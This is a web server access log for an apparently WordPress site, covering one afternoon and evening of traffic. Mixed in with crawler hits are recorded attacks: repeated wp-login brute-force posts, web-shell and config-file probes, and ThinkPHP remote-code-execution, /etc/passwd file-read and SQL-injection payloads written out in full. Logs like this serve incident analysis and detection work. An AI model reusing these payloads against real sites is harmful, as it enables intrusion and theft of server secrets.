93.46.24.112 - - [26/Aug/2026:11:31:39 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
62.60.130.142 - - [26/Aug/2026:11:55:01 +0200] "GET /wp-login.php HTTP/1.1" 301 162 "https://duckduckgo.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0"
93.46.24.112 - - [26/Aug/2026:12:14:24 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
216.244.66.239 - - [26/Aug/2026:12:28:03 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
62.60.130.198 - - [26/Aug/2026:12:32:25 +0200] "POST /?rest_route=/batch/v1 HTTP/1.1" 301 162 "-" "wp2shell"
72.145.76.107 - - [26/Aug/2026:12:36:39 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:12:39:18 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:13:03:51 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:13:28:22 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
178.173.244.23 - - [26/Aug/2026:13:45:15 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
93.46.24.112 - - [26/Aug/2026:13:52:51 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:14:17:25 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
43.166.244.66 - - [26/Aug/2026:14:32:29 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
34.76.84.171 - - [26/Aug/2026:14:32:39 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
147.182.216.142 - - [26/Aug/2026:14:37:01 +0200] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.210.26.108 - - [26/Aug/2026:14:39:29 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:14:41:56 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
8.217.145.188 - - [26/Aug/2026:14:42:25 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
66.249.70.100 - - [26/Aug/2026:14:55:24 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.100 - - [26/Aug/2026:14:55:25 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.173 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.117.249.31 - - [26/Aug/2026:15:04:19 +0200] "GET / HTTP/1.1" 301 162 "-" "presupuestor-crm-enrich/1.0 (+https://presupuestor.com; contacto: miguelgutierrezbarquin@gmail.com)"
93.46.24.112 - - [26/Aug/2026:15:06:24 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
136.124.34.29 - - [26/Aug/2026:15:19:34 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0"
173.252.87.45 - - [26/Aug/2026:15:20:32 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
173.252.87.54 - - [26/Aug/2026:15:20:34 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
173.252.87.34 - - [26/Aug/2026:15:20:34 +0200] "GET / HTTP/1.1" 301 162 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
43.157.175.122 - - [26/Aug/2026:15:26:40 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
129.211.172.249 - - [26/Aug/2026:15:29:02 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:15:31:14 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
116.179.32.235 - - [26/Aug/2026:15:36:33 +0200] "GET /fiscalizacion-de-las-obras-de-renovacion-del-belgrano-sur-entre-estaciones-tapiales-y-marinos-del-crucero-general-belgrano/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
119.249.100.179 - - [26/Aug/2026:15:38:33 +0200] "GET /fiscalizacion-de-las-obras-de-renovacion-del-belgrano-sur-entre-estaciones-tapiales-y-marinos-del-crucero-general-belgrano/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Mobile Safari/537.36"
93.46.24.112 - - [26/Aug/2026:15:55:57 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
64.89.163.228 - - [26/Aug/2026:16:02:33 +0200] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
64.89.163.228 - - [26/Aug/2026:16:02:33 +0200] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
64.89.163.228 - - [26/Aug/2026:16:02:33 +0200] "POST /wp-plain.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
64.89.163.228 - - [26/Aug/2026:16:02:33 +0200] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
64.89.163.228 - - [26/Aug/2026:16:02:33 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
64.89.163.228 - - [26/Aug/2026:16:02:34 +0200] "POST /alfacgiapi/perl.alfa HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
69.165.68.154 - - [26/Aug/2026:16:05:04 +0200] "GET /index.php?rest_route=/wp/v2/posts&per_page=10&_fields=id,comment_status,date&orderby=date&order=desc HTTP/1.1" 301 162 "http://grupo-seg.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.99.60 Safari/537.36 Edg/124.0.99.60"
161.118.231.98 - - [26/Aug/2026:16:08:31 +0200] "GET /wp-content/plugins/pods/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:34 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:34 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:35 +0200] "GET /wp-content/plugins/translatepress-multilingual/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
161.118.231.98 - - [26/Aug/2026:16:08:37 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:39 +0200] "GET /wp-content/plugins/updraftplus/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:40 +0200] "GET /wp-content/plugins/updraftplus/init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:40 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
161.118.231.98 - - [26/Aug/2026:16:08:41 +0200] "POST /?rest_route=/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
216.244.66.239 - - [26/Aug/2026:16:12:17 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.239 - - [26/Aug/2026:16:12:17 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
93.46.24.112 - - [26/Aug/2026:16:20:42 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
51.68.107.151 - - [26/Aug/2026:16:35:40 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/)"
51.68.107.151 - - [26/Aug/2026:16:35:42 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/)"
93.46.24.112 - - [26/Aug/2026:16:45:29 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
91.92.47.191 - - [26/Aug/2026:16:49:51 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.5735.110 Safari/537.36"
91.92.47.191 - - [26/Aug/2026:16:50:02 +0200] "GET /wp-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148"
91.92.47.191 - - [26/Aug/2026:16:50:11 +0200] "GET /config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/15.1 Safari/605.1.15"
91.92.47.191 - - [26/Aug/2026:16:50:19 +0200] "GET /configuration.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/15.1 Safari/605.1.15"
91.92.47.191 - - [26/Aug/2026:16:50:24 +0200] "GET /settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148"
72.145.93.142 - - [26/Aug/2026:16:53:10 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.0 Safari/537.36"
34.96.41.167 - - [26/Aug/2026:17:07:18 +0200] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:17:10:00 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
79.117.249.31 - - [26/Aug/2026:17:14:16 +0200] "GET / HTTP/1.1" 301 162 "-" "presupuestor-crm-enrich/1.0 (+https://presupuestor.com; contacto: miguelgutierrezbarquin@gmail.com)"
93.46.24.112 - - [26/Aug/2026:17:34:42 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
72.145.83.93 - - [26/Aug/2026:17:35:28 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.0 Safari/537.36"
156.245.205.68 - - [26/Aug/2026:17:58:53 +0200] "GET /static/images/nopic.png HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
93.46.24.112 - - [26/Aug/2026:17:59:08 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
104.252.3.127 - - [26/Aug/2026:18:07:05 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
192.30.83.106 - - [26/Aug/2026:18:07:05 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
135.232.20.41 - - [26/Aug/2026:18:16:04 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:18:23:41 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
4.154.191.127 - - [26/Aug/2026:18:35:48 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:36:17 +0200] "POST /?rest_route=/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:36:36 +0200] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:36:53 +0200] "POST /index.php/wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:39:18 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:39:32 +0200] "POST /?rest_route=/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:39:55 +0200] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:40:11 +0200] "POST /index.php/wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:40:46 +0200] "POST /index.php/wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:44:14 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:44:36 +0200] "POST /?rest_route=/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:45:07 +0200] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0"
4.154.191.127 - - [26/Aug/2026:18:45:40 +0200] "POST /index.php/wp-json/batch/v1 HTTP/1.1" 301 162 "-" "Mozilla/5.0"
93.46.24.112 - - [26/Aug/2026:18:47:48 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:19:11:56 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
43.154.250.181 - - [26/Aug/2026:19:22:41 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:19:36:36 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:20:01:02 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
168.107.89.182 - - [26/Aug/2026:20:18:03 +0200] "GET /wp-content/plugins/pods/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
168.107.89.182 - - [26/Aug/2026:20:18:04 +0200] "GET /wp-content/plugins/pods/init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
101.226.10.126 - - [26/Aug/2026:20:24:04 +0200] "GET / HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:07 +0200] "GET /?s=/manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:09 +0200] "GET /?s=/manage/\x5Cthink\x5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:10 +0200] "GET /?s=/manage/\x5Cthink\x5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=assert&vars%5B1%5D%5B%5D=phpinfo() HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:10 +0200] "GET /?s=/manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:12 +0200] "POST /?s=manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:14 +0200] "POST /?s=manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:16 +0200] "GET /?s=/manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:18 +0200] "GET /?s=/manage/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:18 +0200] "GET /?s=/manage/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=assert&vars%5B1%5D%5B%5D=phpinfo() HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:19 +0200] "GET /?s=/manage/\x5Cthink\x5Cview\x5Cdriver\x5Cphp/display&content=%3C?php%20phpinfo();?%3E HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:19 +0200] "POST /?s=captcha&test=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:21 +0200] "POST /?s=captcha&test=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:23 +0200] "POST /?s=captcha&test=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:25 +0200] "GET /?s=/manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:27 +0200] "GET /?s=manage/\x5Cthink\x5CRequest/input&filter%5B%5D=phpinfo&data=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:27 +0200] "GET /?s=/manage/\x5Cthink\x5Crequest/input?data%5B%5D=phpinfo()&filter=assert HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:27 +0200] "GET /?s=/manage HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:29 +0200] "GET /?s=manage/\x5Cthink\x5Cmodule/action/param1/$%7B@phpinfo()%7D HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:30 +0200] "POST /index.php?s=captcha HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:32 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:34 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:35 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:37 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:39 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:40 +0200] "GET /index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:43 +0200] "POST /index.php?s=captcha HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:46 +0200] "POST /index.php?s=captcha HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:48 +0200] "POST /index.php?s=captcha HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:50 +0200] "POST /index.php HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:53 +0200] "GET /index.php?ids%5B0,UpdAtexml(0,ConcAt(0xa,Md5(520)),0)%5D=1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:54 +0200] "GET /index.php?s=index/\x5Cthink\x5Cview\x5Cdriver\x5CPhp/display&content=%3C?php%20var_dump(md5(2333));?%3E HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:55 +0200] "GET /index.php?s=index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=think\x5C__include_file&vars%5B1%5D%5B%5D=/etc/passwd HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:55 +0200] "GET /index.php?s=index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=think\x5C__include_file&vars%5B1%5D%5B%5D=c:/windows/win.ini HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:55 +0200] "GET /index.php?s=index/\x5Cthink\x5CLang/load&file=/etc/passwd HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:55 +0200] "GET /index.php?s=index/\x5Cthink\x5CLang/load&file=c:/windows/win.ini HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:55 +0200] "GET /index.php?s=index/\x5Cthink\x5CConfig/load&file=/etc/passwd HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:56 +0200] "GET /index.php?s=index/\x5Cthink\x5CConfig/load&file=c:/windows/win.ini HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:56 +0200] "GET /index.php?s=my-show-id-\x5Cx5C..\x5Cx5CTpl\x5Cx5C8edy\x5Cx5CHome\x5Cx5Cmy_1%7B~var_dump(md5(2333))%7D%5D HTTP/1.1" 301 162 "-" "-"
